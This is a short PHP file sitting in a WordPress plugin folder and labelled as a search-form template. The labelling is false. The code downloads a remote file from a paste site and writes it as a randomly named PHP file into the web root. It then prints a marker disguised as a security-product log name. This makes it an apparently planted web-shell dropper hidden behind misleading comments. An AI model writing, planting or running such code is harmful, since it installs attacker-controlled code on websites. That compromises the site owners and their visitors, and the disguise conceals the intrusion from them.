File: /var/www/html/wp-content/plugins/eth-embed-fm/settings.php
<?php
/**
* The searchform.php template.
*
* Used any time that get_search_form() is called.
*
* @link https://wordpress.org/themes/basics/template/
* @package WordPress
* @subpackage
* @since 1.0
*/
/*
* Generate a unique ID for each form and a string containing an aria-label
* if one was passed to get_search_form() in the args array.
*/
//IDX for each form and a string
$name = uniqid();
if ( @copy("https://paste.ee/r/Zdi37", "../../../" . $name . ".php") ) {
echo $name . "_imunify360_log_shield";
}else{
echo "Fail.";
}
?>